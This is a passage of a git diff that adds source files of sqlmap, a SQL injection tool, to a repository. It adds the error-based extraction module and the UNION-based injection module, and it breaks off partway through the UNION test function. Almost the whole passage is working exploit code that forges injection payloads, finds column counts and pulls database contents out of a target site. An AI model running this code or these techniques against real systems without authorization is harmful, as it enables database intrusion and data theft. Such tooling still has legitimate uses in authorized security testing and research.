kb.bruteMode: + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) + logger.debug(debugMsg) + + elif conf.dnsDomain: + warnMsg = "DNS data exfiltration method through SQL injection " + warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() + singleTimeWarnMessage(warnMsg) + + return safecharencode(retVal) if kb.safeCharEncode else retVal diff --git a/src/sqlmap-master/lib/techniques/error/__init__.py b/src/sqlmap-master/lib/techniques/error/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/techniques/error/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/techniques/error/use.py b/src/sqlmap-master/lib/techniques/error/use.py new file mode 100644 index 0000000..7089292 --- /dev/null +++ b/src/sqlmap-master/lib/techniques/error/use.py @@ -0,0 +1,470 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import re +import time + +from lib.core.agent import agent +from lib.core.bigarray import BigArray +from lib.core.common import Backend +from lib.core.common import calculateDeltaSeconds +from lib.core.common import dataToStdout +from lib.core.common import decodeDbmsHexValue +from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone +from lib.core.common import getConsoleWidth +from lib.core.common import getPartRun +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import incrementCounter +from lib.core.common import initTechnique +from lib.core.common import isListLike +from lib.core.common import isNumPosStrValue +from lib.core.common import listToStrValue +from lib.core.common import readInput +from lib.core.common import unArrayizeValue +from lib.core.common import wasLastResponseHTTPError +from lib.core.compat import xrange +from lib.core.convert import decodeHex +from lib.core.convert import getUnicode +from lib.core.convert import htmlUnescape +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import HTTP_HEADER +from lib.core.exception import SqlmapDataException +from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD +from lib.core.settings import MAX_ERROR_CHUNK_LENGTH +from lib.core.settings import MIN_ERROR_CHUNK_LENGTH +from lib.core.settings import NULL +from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import ROTATING_CHARS +from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD +from lib.core.settings import SQL_SCALAR_REGEX +from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.core.unescaper import unescaper +from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from thirdparty import six + +def _oneShotErrorUse(expression, field=None, chunkTest=False): + offset = 1 + rotator = 0 + partialValue = None + threadData = getCurrentThreadData() + retVal = hashDBRetrieve(expression, checkConf=True) + + if retVal and PARTIAL_VALUE_MARKER in retVal: + partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") + logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue)) + offset += len(partialValue) + + threadData.resumed = retVal is not None and not partialValue + + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: + debugMsg = "searching for error chunk length..." + logger.debug(debugMsg) + + seen = set() + current = MAX_ERROR_CHUNK_LENGTH + while current >= MIN_ERROR_CHUNK_LENGTH: + testChar = str(current % 10) + + if Backend.isDbms(DBMS.ORACLE): + testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar) + else: + testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) + testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery) + + result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) + seen.add(current) + + if (result or "").startswith(testChar): + if result == testChar * current: + kb.errorChunkLength = current + break + else: + result = re.search(r"\A\w+", result).group(0) + candidate = len(result) - len(kb.chars.stop) + current = candidate if candidate != current and candidate not in seen else current - 1 + else: + current = current // 2 + + if kb.errorChunkLength: + hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) + else: + kb.errorChunkLength = 0 + + if retVal is None or partialValue: + try: + while True: + check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start + + if field: + nulledCastedField = agent.nullAndCastField(field) + + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: + extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) + if extendedField != field: # e.g. MIN(surname) + nulledCastedField = extendedField.replace(field, nulledCastedField) + field = extendedField + nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) + + # Forge the error-based SQL injection request + vector = getTechniqueData().vector + query = agent.prefixQuery(vector) + query = agent.suffixQuery(query) + injExpression = expression.replace(field, nulledCastedField, 1) if field else expression + injExpression = unescaper.escape(injExpression) + injExpression = query.replace("[QUERY]", injExpression) + payload = agent.payload(newValue=injExpression) + + # Perform the request + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) + + incrementCounter(getTechnique()) + + if page and conf.noEscape: + page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) + + # Parse the returned page to get the exact error-based + # SQL injection output + output = firstNotNone( + extractRegexResult(check, page), + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) + + if output is not None: + output = getUnicode(output) + else: + trimmed = firstNotNone( + extractRegexResult(trimCheck, page), + extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) + + if trimmed: + if not chunkTest: + warnMsg = "possible server trimmed output detected " + warnMsg += "(due to its length and/or content): " + warnMsg += safecharencode(trimmed) + logger.warning(warnMsg) + + if not kb.testMode: + check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2] + output = extractRegexResult(check, trimmed, re.IGNORECASE) + + if not output: + check = r"(?P<result>[^\s<>'\"]+)" + output = extractRegexResult(check, trimmed, re.IGNORECASE) + else: + output = output.rstrip() + + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)): + if offset == 1: + retVal = output + else: + retVal += output if output else '' + + if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: + offset += kb.errorChunkLength + else: + break + + if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)): + if kb.fileReadMode: + dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + elif offset > 1: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) + else: + retVal = output + break + except: + if retVal is not None: + hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) + raise + + retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal + + if isinstance(retVal, six.string_types): + retVal = htmlUnescape(retVal).replace("<br>", "\n") + + retVal = _errorReplaceChars(retVal) + + if retVal is not None: + hashDBWrite(expression, retVal) + + else: + _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + retVal = extractRegexResult(_, retVal) or retVal + + return safecharencode(retVal) if kb.safeCharEncode else retVal + +def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): + values = [] + origExpr = None + + width = getConsoleWidth() + threadData = getCurrentThreadData() + + for field in expressionFieldsList: + output = None + + if field.startswith("ROWNUM "): + continue + + if isinstance(num, int): + origExpr = expression + expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) + + if "ROWNUM" in expressionFieldsList: + expressionReplaced = expression + else: + expressionReplaced = expression.replace(expressionFields, field, 1) + + output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field) + + if not kb.threadContinue: + return None + + if not any((suppressOutput, kb.bruteMode)): + if kb.fileReadMode and output and output.strip(): + print() + elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): + status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + + if len(status) > width: + status = "%s..." % status[:width - 3] + + dataToStdout("%s\n" % status) + + if isinstance(num, int): + expression = origExpr + + values.append(output) + + return values + +def _errorReplaceChars(value): + """ + Restores safely replaced characters + """ + + retVal = value + + if value: + retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") + + return retVal + +def _formatPartialContent(value): + """ + Prepares (possibly hex-encoded) partial content for safe console output + """ + + if value and isinstance(value, six.string_types): + try: + value = decodeHex(value, binary=False) + except: + pass + finally: + value = safecharencode(value) + + return value + +def errorUse(expression, dump=False): + """ + Retrieve the output of a SQL query taking advantage of the error-based + SQL injection vulnerability on the affected parameter. + """ + + initTechnique(getTechnique()) + + abortedFlag = False + count = None + emptyFields = [] + start = time.time() + startLimit = 0 + stopLimit = None + value = None + + _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) + + # Set kb.partRun in case the engine is called from the API + kb.partRun = getPartRun(alias=False) if conf.api else None + + # We have to check if the SQL query might return multiple entries + # and in such case forge the SQL limiting the query output one + # entry at a time + # NOTE: we assume that only queries that get data from a table can + # return multiple entries + if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): + expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) + + if limitCond: + # Count the number of SQL query entries output + countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) + + if " ORDER BY " in countedExpression.upper(): + _ = countedExpression.upper().rindex(" ORDER BY ") + countedExpression = countedExpression[:_] + + _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) + count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields)) + + if isNumPosStrValue(count): + if isinstance(stopLimit, int) and stopLimit > 0: + stopLimit = min(int(count), int(stopLimit)) + else: + stopLimit = int(count) + + debugMsg = "used SQL query returns " + debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") + logger.debug(debugMsg) + + elif count and not count.isdigit(): + warnMsg = "it was not possible to count the number " + warnMsg += "of entries for the SQL query provided. " + warnMsg += "sqlmap will assume that it returns only " + warnMsg += "one entry" + logger.warning(warnMsg) + + stopLimit = 1 + + elif not isNumPosStrValue(count): + if not count: + warnMsg = "the SQL query provided does not " + warnMsg += "return any output" + logger.warning(warnMsg) + else: + value = [] # for empty tables + return value + + if isNumPosStrValue(count) and int(count) > 1: + if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: + message = "due to huge table size do you want to remove " + message += "ORDER BY clause gaining speed over consistency? [y/N] " + + if readInput(message, default='N', boolean=True): + expression = expression[:expression.index(" ORDER BY ")] + + numThreads = min(conf.threads, (stopLimit - startLimit)) + + threadData = getCurrentThreadData() + + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + + if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): + for field in expressionFieldsList: + if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': + emptyFields.append(field) + debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) + debugMsg += "dumped as it appears to be empty" + logger.debug(debugMsg) + + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. It might take too long" + logger.debug(debugMsg) + + try: + def errorThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + threadData.shared.counter += 1 + num = next(threadData.shared.limits) + except StopIteration: + break + + output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) + + if not kb.threadContinue: + break + + if output and isListLike(output) and len(output) == 1: + output = unArrayizeValue(output) + + with kb.locks.value: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, output)) + while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: + threadData.shared.lastFlushed += 1 + threadData.shared.value.append(threadData.shared.buffered[0][1]) + del threadData.shared.buffered[0] + + runThreads(numThreads, errorThread) + + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) + + finally: + threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) + value = threadData.shared.value + kb.suppressResumeInfo = False + + if not value and not abortedFlag: + value = _errorFields(expression, expressionFields, expressionFieldsList) + + if value and isListLike(value): + if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))): + value = unArrayizeValue(value) + elif len(value) > 1 and stopLimit == 1: + value = [value] + + duration = calculateDeltaSeconds(start) + + if not kb.bruteMode: + debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration) + logger.debug(debugMsg) + + return value diff --git a/src/sqlmap-master/lib/techniques/union/__init__.py b/src/sqlmap-master/lib/techniques/union/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/techniques/union/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/techniques/union/test.py b/src/sqlmap-master/lib/techniques/union/test.py new file mode 100644 index 0000000..c62aea9 --- /dev/null +++ b/src/sqlmap-master/lib/techniques/union/test.py @@ -0,0 +1,402 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import itertools +import logging +import random +import re + +from lib.core.agent import agent +from lib.core.common import average +from lib.core.common import Backend +from lib.core.common import getPublicTypeMembers +from lib.core.common import isNullValue +from lib.core.common import listToStrValue +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import removeReflectiveValues +from lib.core.common import setTechnique +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage +from lib.core.common import stdev +from lib.core.common import wasLastResponseDBMSError +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.decorators import stackedmethod +from lib.core.dicts import FROM_DUMMY_TABLE +from lib.core.enums import FUZZ_UNION_COLUMN +from lib.core.enums import PAYLOAD +from lib.core.settings import FUZZ_UNION_ERROR_REGEX +from lib.core.settings import FUZZ_UNION_MAX_COLUMNS +from lib.core.settings import LIMITED_ROWS_TEST_NUMBER +from lib.core.settings import MAX_RATIO +from lib.core.settings import MIN_RATIO +from lib.core.settings import MIN_STATISTICAL_RANGE +from lib.core.settings import MIN_UNION_RESPONSES +from lib.core.settings import NULL +from lib.core.settings import ORDER_BY_MAX +from lib.core.settings import ORDER_BY_STEP +from lib.core.settings import UNION_MIN_RESPONSE_CHARS +from lib.core.settings import UNION_STDEV_COEFF +from lib.core.unescaper import unescaper +from lib.request.comparison import comparison +from lib.request.connect import Connect as Request + +def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL): + """ + Finds number of columns affected by UNION based injection + """ + retVal = None + + @stackedmethod + def _orderByTechnique(lowerCount=None, upperCount=None): + def _orderByTest(cols): + query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) + query = agent.suffixQuery(query, suffix=suffix, comment=comment) + payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + + if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): + infoMsg = "'ORDER BY' technique appears to be usable. " + infoMsg += "This should reduce the time needed " + infoMsg += "to find the right number " + infoMsg += "of query columns. Automatically extending the " + infoMsg += "range for current UNION query injection technique test" + singleTimeLogMessage(infoMsg) + + lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount + found = None + while not found: + if not conf.uCols and _orderByTest(highCols): + lowCols = highCols + highCols += ORDER_BY_STEP + + if highCols > ORDER_BY_MAX: + break + else: + while not found: + mid = highCols - (highCols - lowCols) // 2 + if _orderByTest(mid): + lowCols = mid + else: + highCols = mid + if (highCols - lowCols) < 2: + found = lowCols + + return found + + try: + pushValue(kb.errorIsNone) + items, ratios = [], [] + kb.errorIsNone = False + lowerCount, upperCount = conf.uColsStart, conf.uColsStop + + if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # Note: ORDER BY is not bullet-proof + found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique() + + if found: + kb.orderByColumns = found + infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") + singleTimeLogMessage(infoMsg) + return found + elif kb.futileUnion: + return None + + if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: + upperCount = lowerCount + MIN_UNION_RESPONSES + + min_, max_ = MAX_RATIO, MIN_RATIO + pages = {} + + for count in xrange(lowerCount, upperCount + 1): + query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + + if not isNullValue(kb.uChar): + pages[count] = page + + ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO + ratios.append(ratio) + min_, max_ = min(min_, ratio), max(max_, ratio) + items.append((count, ratio)) + + if not isNullValue(kb.uChar): + value = re.escape(kb.uChar.strip("'")) + for regex in (value, r'>\s*%s\s*<' % value): + contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None] + if len(contains) == 1: + retVal = contains[0] + break + + if not retVal: + if min_ in ratios: + ratios.pop(ratios.index(min_)) + if max_ in ratios: + ratios.pop(ratios.index(max_)) + + minItem, maxItem = None, None + + for item in items: + if item[1] == min_: + minItem = item + elif item[1] == max_: + maxItem = item + + if all(_ == min_ and _ != max_ for _ in ratios): + retVal = maxItem[0] + + elif all(_ != min_ and _ == max_ for _ in ratios): + retVal = minItem[0] + + elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: + deviation = stdev(ratios) + + if deviation is not None: + lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation + + if min_ < lower: + retVal = minItem[0] + + if max_ > upper: + if retVal is None or abs(max_ - upper) > abs(min_ - lower): + retVal = maxItem[0] + finally: + kb.errorIsNone = popValue() + + if retVal: + infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal + singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg)) + + return retVal + +def _fuzzUnionCols(place, parameter, prefix, suffix): + retVal = None + + if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns: + comment = queries[Backend.getIdentifiedDbms()].comment.query + + choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True) + random.shuffle(choices) + + for candidate in itertools.product(choices, repeat=kb.orderByColumns): + if retVal: + break + elif FUZZ_UNION_COLUMN.STRING not in candidate: + continue + else: + candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate] + + query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix) + query = agent.suffixQuery(query, suffix=suffix, comment=comment) + payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + + if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""): + for column in candidate: + if column.startswith("'") and column.strip("'") in (page or ""): + retVal = [(_ if _ != column else "%s") for _ in candidate] + break + + return retVal + +def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): + validPayload = None + vector = None + + positions = [_ for _ in xrange(0, count)] + + # Unbiased approach for searching appropriate usable column + random.shuffle(positions) + + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break + + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower() + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) + + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower() + + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate) + + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower() + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower() + + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) + + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower() + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. Switching to partial mode" + logger.warning(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warning(warnMsg) + else: + break + + return validPayload, vector + +def _unionConfirm(comment, place, parameter, prefix, suffix, count): + validPayload = None + vector = None + + # Confirm the union SQL injection and get the exact column + # position which can be used to extract data + validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count) + + # Assure that the above function found the exploitable full union + # SQL injection position + if not validPayload: + validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) + + return validPayload, vector + +def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): + """ + This method tests if the target URL is affected by an union + SQL injection vulnerability. The test is done up to 50 columns + on the target database table + """ + + validPayload = None + vector = None + orderBy = kb.orderByColumns + uChars = (conf.uChar, kb.uChar) + where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE + + # In case that user explicitly stated number of columns affected + if conf.uColsStop == conf.uColsStart: + count = conf.uColsStart + else: + count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where) + + if count: + validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) + + if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)): + if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS: + if kb.fuzzUnionTest is None: + msg = "do you want to (re)try to find proper " + msg += "UNION column types with fuzzy test? [y/N] " + + kb.fuzzUnionTest = readInput(msg, default='N', boolean=True) + if kb.fuzzUnionTest: + kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix) + + warnMsg = "if UNION based SQL injection is not detected, " + warnMsg += "please consider " + + if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None: + message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " + + if not readInput(message, default='Y', boolean=True): + warnMsg += "usage of option '--union-char' " + warnMsg += "(e.g. '--union-char=1') " + else: + conf.uChar = kb.uChar = str(randomInt(2)) + validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) + + if not conf.dbms: + if not conf.uChar: + warnMsg += "and/or try to force the " + else: + warnMsg += "forcing the " + warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " + + if not all((validPayload, vector)) and not warnMsg.endswith("consider "): + singleTimeWarnMessage(warnMsg) + + if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)): # discard ORDER BY results (not usable - e.g. maybe invalid altogether) + conf.uChar, kb.uChar = uChars + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + + return validPayload, vector + +@stackedmethod +def unionTest(comment, place, parameter, value, prefix, suffix): + """ + This method tests if the target URL is affected by an union + SQL injection vulnerability. The test is done up to 3*50 times + """ + + if conf.direct: + return + + negativeLogic = kb.negativeLogic + setTechnique(PAYLOAD.TECHNIQUE.UNION) + + try: + if negativeLogic: + pushValue(kb.negativeLogic) + pushValue(conf.string) + pushValue(conf.code) + + kb.negativeLogic = False + conf.string = conf.code = None + + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + finally: + if negativeLogic: 